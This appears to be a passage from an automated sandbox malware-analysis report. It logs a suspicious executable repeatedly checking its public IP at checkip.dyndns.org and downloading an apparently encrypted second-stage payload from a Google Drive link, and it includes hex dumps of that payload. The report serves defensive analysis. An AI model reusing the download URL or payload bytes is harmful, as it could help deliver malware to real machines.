                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.950033132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:45.645616055 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:46.317318916 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:46 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.950035132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:47.257117033 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:47.939408064 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.950037132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:48.893722057 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:49.585043907 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.950039132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:50.417284012 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:51.114533901 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:51 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.950041132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:52.098161936 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:52.793376923 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.950043132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:53.735686064 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:54.435216904 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.950045132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:55.293111086 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:55.965363026 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.950047132.226.247.73801072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 23:12:56.990768909 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 23:12:57.696752071 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:12:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.949972216.58.206.464431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:11:47 UTC216OUTGET /uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
                                                                                                          2025-01-10 22:11:47 UTC1920INHTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 10 Jan 2025 22:11:47 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'nonce-bW4cjSzBl_2Dw4CZ1jvetQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.949974142.250.181.2254431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:11:48 UTC258OUTGET /download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:11:51 UTC4944INHTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFIdbgS7Lai0fr4L14Qax-dP0nWxek8Qf3M68IRhtebFwxmskJO3z34P0P_nWlUrXNDLREjf
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="sMscBVXhTocIfuwGoZBYD188.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Tue, 10 Dec 2024 07:32:04 GMT
                                                                                                          Date: Fri, 10 Jan 2025 22:11:50 GMT
                                                                                                          Expires: Fri, 10 Jan 2025 22:11:50 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=pYC8Dw==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2025-01-10 22:11:51 UTC4944INData Raw: 55 d3 96 21 a5 e2 1b 76 17 03 6f 65 13 45 3b 84 96 c4 37 b2 3d bc c4 3b b4 1c 8c 3f 64 b3 2e 2f 2a 9d ef 45 95 40 60 3d 3f 7a db d5 ff d0 46 2b 54 2d ed 7c ef a3 dd 81 10 1f bd 28 44 43 89 1b 25 be a8 cb 62 07 ec d1 6d 25 a6 31 05 12 53 e3 0d 94 ab da af a0 be 45 e3 0a da c0 77 3f 68 f0 ff 80 ac 84 69 8d b4 b9 0d 14 2a 4a 64 61 58 77 74 c0 b6 a7 0d 8c 81 5f 01 3d e9 b6 49 c5 6f ca 26 46 08 d4 08 50 a2 54 b0 af 6e 0b c8 30 69 dc 36 a7 92 51 43 51 c3 84 7f e0 49 25 9a 6a 89 16 07 ae c9 8b 32 6e 60 f9 ec 83 8a 2e 55 70 c8 d1 36 c4 c8 fc 81 aa 3c 0c b0 b0 71 34 c9 1c fc c9 94 41 7a 5d 5d 3c 4f 05 b7 88 1b 84 f4 28 ad 86 e3 89 03 65 e8 2e 2d bc 20 17 0a d2 bf c3 67 d1 25 a3 c9 e4 51 dc 65 b1 c9 3c 8a 30 3f c8 33 62 ac 11 fa 44 a9 dc bc 61 ca 37 0f 57 9c 93 ad
                                                                                                          Data Ascii: U!voeE;7=;?d./*E@`=?zF+T-|(DC%bm%1SEw?hi*JdaXwt_=Io&FPTn0i6QCQI%j2n`.Up6<q4Az]]<O(e.- g%Qe<0?3bDa7W
                                                                                                          2025-01-10 22:11:51 UTC4810INData Raw: 17 8b b2 1d b9 a1 f8 16 99 e0 c7 bf 98 99 d5 21 10 11 52 1e ed 35 b0 b2 a2 df 97 17 7c 19 63 fe 95 fb d7 67 e5 a4 80 0b 63 7f d0 8f c4 68 f2 80 f2 61 93 38 24 2b 08 49 dd b3 6d 90 79 69 a9 27 02 c1 9e a7 f9 58 33 b5 a6 a5 8d e5 d3 44 dd 11 25 2a c2 f2 92 86 5d 2e 22 3b 64 2e 4c da 8b d3 4e 61 6e 39 b4 aa 3e 5d 3d 4c b9 1f 3c 49 cd 08 e7 0d 1e e1 42 af 6b 5f ad 18 42 d9 e2 2a c3 99 af 96 4d 94 22 dc 8b 74 be 29 72 99 5c 51 2a a9 a6 31 60 2a 65 03 72 84 7e 1d 2f c0 9a 0c 0d 46 53 9b 5d 01 89 0d 6b c4 9e 3c e9 54 9d d9 b4 17 b0 76 95 48 c5 b2 b0 79 aa cb 00 10 92 fb fa a0 ca 37 b6 2b 92 9f 2b af d4 60 59 91 ba 06 76 7a 5c 06 4d 08 4a da 4c e7 94 74 03 23 ee 3d 96 53 b6 78 75 5f ba 0b a9 43 bd 0d 92 7d 11 94 fc 0d 66 3e 1f 00 13 ab ce 33 17 1d 36 e2 21 f6 71
                                                                                                          Data Ascii: !R5|cgcha8$+Imyi'X3D%*].";d.LNan9>]=L<IBk_B*M"t)r\Q*1`*er~/FS]k<TvHy7++`Yvz\MJLt#=Sxu_C}f>36!q
                                                                                                          2025-01-10 22:11:51 UTC1322INData Raw: f4 32 aa 1e 22 8c 4e d6 1a 77 d6 3f a1 3d ed 9c f1 4d 39 fc 0f 6e 7f 15 6e 74 11 ba 2f 71 b1 f7 c3 a6 2c cd 30 26 7e ee a9 d0 60 32 ed a0 f0 ba 51 51 8d 9e 0d 8b 91 31 c6 f9 37 7b c5 f1 12 b4 da 49 a6 00 58 60 42 53 58 83 1f 18 ea eb 98 47 f6 bf bf a2 55 bb 58 72 67 30 5d f5 c4 22 c7 17 e8 45 12 b2 37 a8 d5 8f f0 f6 e3 df 3e 49 29 f4 d5 8e f0 b8 8d 3e a9 78 4e 3a 6c 40 f1 6c fd 9f 40 8d c0 94 e9 e9 11 b9 46 b6 71 04 7a b8 59 d6 e9 78 81 80 d8 94 5c 44 25 55 d0 2f 32 3e 51 07 08 24 57 d0 9a c8 d0 d2 b6 4b 7d 6a 15 3b b7 9e 4d 2d 20 6f e8 d3 e6 40 08 a3 59 1e bf 0d 37 28 dc 39 e3 eb b1 60 e7 4a 22 99 36 24 61 50 05 3d 61 23 19 62 a2 cc e6 a2 7f cd 4d 86 25 8a 4e be bb af 3b 6a c7 d3 5a 5c 09 87 27 20 f0 1c 06 67 29 22 b7 bf ad 32 aa c8 56 b1 1b 0f ae 17 70
                                                                                                          Data Ascii: 2"Nw?=M9nnt/q,0&~`2QQ17{IX`BSXGUXrg0]"E7>I)>xN:l@l@FqzYx\D%U/2>Q$WK}j;M- o@Y7(9`J"6$aP=a#bM%N;jZ\' g)"2Vp
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: 75 84 1f f9 22 e7 18 f8 3e 4c 72 d5 1b 97 42 6f 64 3f 02 e6 cd 8d d9 89 84 23 c3 89 7f 08 3b 3c fc 0a b8 51 07 74 1e 92 e5 82 5a fb 30 75 5e 2a 76 08 63 79 0f 2b 18 07 d5 b3 8c 82 b5 28 b7 17 f4 7e ea b2 d4 4a 79 63 c9 87 77 5e 51 89 98 0f e2 de 19 1b fd 1f a0 d6 f4 09 cc bb d8 78 0b 4a 62 96 45 54 83 0c 33 87 ea 02 47 fc bf 47 a2 7e a8 58 70 36 77 4d f5 c0 5e 94 0a e8 35 ad e6 38 a8 df 85 f6 fe d7 c4 3a 2f 27 f6 ae e4 f0 b8 98 16 09 a1 4e 30 66 4b eb e3 b9 d5 40 8c e1 fc c8 23 04 b3 1e 40 54 13 02 55 4b c5 9c cb a1 b4 a7 94 31 0e 55 f7 f1 1e 93 20 47 0d 78 86 5b c6 f2 84 ca 5f 23 35 2e 6b 30 27 e1 14 4d 2d 20 11 da d6 e0 21 61 50 54 1c ce e7 12 3f a6 cf 30 eb bb 18 0a 5c 22 eb 22 b7 61 50 0b e1 17 3b 67 b6 8a 98 ec d0 91 d7 44 e5 4d 44 49 92 bc 0f 65 3f
                                                                                                          Data Ascii: u">LrBod?#;<QtZ0u^*vcy+(~Jycw^QxJbET3GG~Xp6wM^58:/'N0fK@#@TUK1U Gx[_#5.k0'M- !aPT?0\""aP;gDMDIe?
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: ea b4 16 30 73 f6 1c 66 6c 10 61 37 b2 b8 2f 75 a2 80 99 ab b6 da 16 e5 70 9d 4d d0 62 3d 70 c6 9c f9 40 5f fb cc 15 f0 ac 5e 2d fd 1f a0 d2 27 77 26 96 49 ac 17 48 71 66 21 0c 99 0c 58 c0 a5 02 47 fc ac 8a b3 44 b3 2b 80 1c 76 57 e6 d2 4d 86 78 19 4f 3a ec 80 bb cc 94 e5 f2 3d d9 ec e8 7d f6 ae c9 e3 ac 9f 05 6f 0a ac 35 6c 30 e2 78 97 c7 51 99 d2 fb a9 86 e3 b3 6e e8 57 15 64 a5 cf e5 3c 69 84 ac 2b 97 34 19 34 42 c7 1e f0 27 7d 0b 1e 37 4f d2 ca 85 d0 c5 a1 2d 2e 7b 06 26 45 d9 57 3b 39 78 d8 f6 e2 51 0e 9e 40 0d df d4 28 08 e9 06 21 ff a0 71 76 55 5d b4 43 79 75 41 1a d2 2d 1e e7 69 9c 66 e7 89 74 d6 57 89 33 87 5a 8f a7 b0 79 df c6 d3 5e 65 cc 94 39 3b e4 0d 1d dc 01 e6 ac 8f ad 21 9f d8 48 a3 21 27 6b 06 70 aa ca 05 36 15 cb 9d 80 2f a3 d2 2f 02 b8
                                                                                                          Data Ascii: 0sfla7/upMb=p@_^-'w&IHqf!XGD+vWMxO:=}o5l0xQnWd<i+44B'}7O-.{&EW;9xQ@(!qvU]CyuA-iftW3Zy^e9;!H!'kp6//
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: 27 38 fc 14 ad e9 f5 0f c3 bd 4c a6 12 52 4b 68 55 72 83 0c 33 d8 ed 02 55 f7 bf 9b 93 55 aa 49 70 1e 04 95 ee c0 2c bc 59 e8 4f 30 ed 21 25 86 85 f6 e4 eb c9 12 9d 24 f6 a4 de 0e b9 84 1f 69 7d 5f 35 40 49 e5 7d 82 d5 78 50 c4 ea ba e9 63 51 75 e2 01 1a 03 4a 5e c5 e6 6e ac 56 d5 96 2d 26 de 55 d4 0d f2 38 40 0b 67 d8 57 d2 eb 93 d8 f9 f1 24 26 05 6b 31 9f c0 65 17 2a 63 ea d3 e9 40 07 fb c9 1c c4 44 24 22 c9 1b 5f 16 b1 6a ed 59 29 8a 46 7b 6d 41 0d 6f 2b 32 13 07 74 98 e6 a8 62 af bb 95 22 91 26 92 b7 ad 4a 0e ad d3 5e 7e d6 87 27 2a e1 14 69 cd 29 22 a6 9c aa 23 8d e4 e6 6f 29 1e a6 73 61 a0 e2 4a 1a 18 d0 86 e3 4c 41 d7 2e 1d aa e8 17 f6 25 8f 19 b2 5c e5 c7 d3 6d 2a dd 5b fd ad a6 7d 2a c5 6c 96 da 58 c5 7b 6f cb 3b 18 a8 4f f0 7b 0f b4 7f ab 9c 1c
                                                                                                          Data Ascii: '8LRKhUr3UUIp,YO0!%$i}_5@I}xPcQuJ^nV-&U8@gW$&k1e*c@D$"_jY)F{mAo+2tb"&J^~'*i)"#o)saJLA.%\m*[}*lX{o;O{
                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: e8 4f 2a e6 37 a8 9b 85 f6 e4 fc fe 3e 65 58 f7 ae c8 c3 b8 89 07 7a 67 52 18 b4 40 f1 64 f4 f5 5d 8d b4 c2 f4 e9 11 b9 64 e2 77 2c 88 b3 5e cf e7 6e bd ea d4 96 27 08 56 82 d4 07 e7 32 59 7f 52 38 57 a2 8e 52 d0 d2 b4 13 26 05 c6 31 9f cc 5a f7 39 65 f6 d3 e7 69 19 8e 54 1c cc 54 30 5a b0 0d 30 9b de bf e7 4a 24 96 45 79 66 22 7f 5f 32 53 76 bd 8a 98 e0 b1 71 c8 55 92 50 07 55 92 c6 c2 95 26 c7 d5 4d 71 cb 82 0f b9 f0 1c 00 5e 21 33 a4 a3 e4 34 a8 ca 57 b1 34 60 aa 07 70 aa 8d 4e 37 15 cb a6 02 5d 41 d1 3c 7b ba e1 03 02 24 40 1b 2d 3f e8 e3 c5 a4 36 1a dd 88 bb 8e d6 39 c2 6e 9c ce 30 8c 73 e1 a8 31 cb a8 bc f0 7b 03 a7 7a ba 9b 08 a2 aa cb 75 15 a3 9d 55 38 0e 9d 1b 19 32 77 08 b8 df 9d af dc b2 0d bd 72 a7 56 5a 6a fd 1b 13 cd 20 99 31 c5 3b 74 70 dd
                                                                                                          Data Ascii: O*7>eXzgR@d]dw,^n'V2YR8WR&1Z9eiTT0Z0J$Eyf"_2SvqUPU&Mq^!34W4`pN7]A<{$@-?69n0s1{zuU82wrVZj 1;tp
